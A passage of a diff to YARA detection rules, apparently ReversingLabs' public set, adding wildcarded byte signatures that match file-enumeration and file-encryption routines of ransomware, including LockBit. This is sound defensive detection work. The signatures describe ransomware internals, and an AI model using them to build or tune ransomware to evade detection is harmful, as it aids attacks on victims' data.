+            8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8
+            ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
+            ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 8B 1B 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
+            58 8B 5D ?? 89 03 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D
+            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85
+            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ??
+            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B
+            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 75 ?? E8
+        }
+		$find_files_p2 = {
+            83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 94 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85
+            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ??
+            B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8
+        }
+		$find_files_p3 = {
+            50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 81 7D ?? ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? FF 75 ?? 8B 5D
+            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45
+            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85
+            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0
+            75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
+            ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ??
+            8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? A1 ?? ?? ?? ?? 50
+            FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ??
+            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D
+            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45
+            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 68
+        }
+		$find_files_p4 = {
+            FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ??
+            6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? FF 75 ?? B9 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ??
+            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ??
+            ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ??
+            ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50
+        }
+		$find_files_p5 = {
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ??
+            ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ??
+            ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ??
+            0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9
+            ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85
+            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+		$encrypt_files_p1 = {
+            B8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
+            B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
+            58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ??
+            ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ??
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85
+            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D
+        }
+		$encrypt_files_p2 = {
+            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ??
+            ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4
+            ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ??
+            50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D
+            ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Akhirah Technologies Inc." and ( pe.signatures [ i ] . serial == "00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" or pe.signatures [ i ] . serial == "e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" ) and 1597276800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Lockbit : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects LockBit ransomware."
 		author = "ReversingLabs"
-		id = "66feefd2-9cec-56fc-a1c1-11004363462d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9a6405dc-da1f-5426-a424-a73bceb1928c"
+		date = "2022-03-31"
+		modified = "2022-03-31"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5024-L5042"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4fc3e57bedb6fb7c96e6a1ee2ad2aec3860716ac714d52ea58b86be4bbda4660"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.LockBit.yara#L1-L282"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "030222bd659c7e0e03858fa062067b1483aca3b7973cce19a1e7cdbb48d4405c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "LockBit"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_resources_v1 = {
+            55 8B EC 83 EC ?? 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ??
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ??
+            ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 56 FF 75 ?? 6A ?? 57 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            33 DB 39 5D ?? 76 ?? 8B F7 0F 1F 80 ?? ?? ?? ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8B CE E8
+            ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 45
+            ?? FF 70 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 8B 45 ?? FF 70 ?? 57 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B
+            0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? F0 FF 05 ?? ?? ?? ?? 8B 7D ?? 43 83 C6 ?? 3B 5D
+            ?? 72 ?? E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 5B 85 C0
+            75 ?? B8 ?? ?? ?? ?? 5F 8B E5 5D C3 33 C0 5F 8B E5 5D C3
+        }
+		$find_files_v1_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B C1 C7 45 ?? ?? ?? ?? ?? 57 50 89 45 ?? 33 C9 8D
+            45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 4D ?? 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 33 C0 8B 35 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D
+            45 ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D3 85 C0
+            0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85
+            C0 0F 84
+        }
+		$find_files_v1_2 = {
+            45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 33 C9 66 39 8D ?? ?? ?? ?? 74 ?? 8D 40 ?? 41 66 83 38 ?? 75 ??
+            83 F9 ?? 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 56 68 ?? ??
+            ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ??
+            56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84
+        }
+		$find_files_v1_3 = {
+            85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ??
+            ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ??
+            56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84
+            ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 C9 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ??
+            ?? ?? 66 90 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 33 C0 C6 45 ?? ?? 66 89 45 ?? 8D
+            45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3
+            85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ??
+            ?? ?? 8B 4D ?? 8D 95 ?? ?? ?? ?? 2B D1 0F B7 01 8D 49 ?? 66 89 44 11 ?? 66 85 C0 75
+            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ??
+            66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 C7 ?? 0F 1F 40 ?? 66 8B 47 ?? 83 C7 ?? 66
+            85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 A8 ?? 75 ??
+            A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6
+            83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 5F
+            5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_v1_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 53 56 57 8B F9 C7 45 ?? ?? ??
+            ?? ?? 89 7D ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66
+            89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+        }
+		$encrypt_files_v1_2 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 33 DB 89 7D ?? 33 F6 0F 1F 00 8B 84
+            B5 ?? ?? ?? ?? 85 C0 74 ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 B8 ?? ?? ?? ?? 0F 44 D8 46
+            81 FE ?? ?? ?? ?? 7C ?? 8B 7D ?? 33 C0 66 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 57 50 8D 85 ?? ?? ?? ?? 89 5D ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D3 83 F8 ?? 75
+            ?? 8B CF E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B
+        }
+		$encrypt_files_v1_3 = {
+            CF E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 FE ?? 7D ?? 46 EB ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83
+            FB ?? 75 ?? 8B 1D ?? ?? ?? ?? EB ?? FF 35 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B
+            E5 5D C3 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? FF 75 ?? FF 15
+            ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 45 ?? 8B 75 ?? 89 43 ?? 8D 43 ?? 50 56 C7
+            43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ??
+            ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 4B ?? 8B 43 ?? 85
+            C9 7F ?? 7C ?? 83 F8 ?? 72 ?? 83 E8 ?? C7 43 ?? ?? ?? ?? ?? 89 43 ?? 8B 43 ?? 83 D9
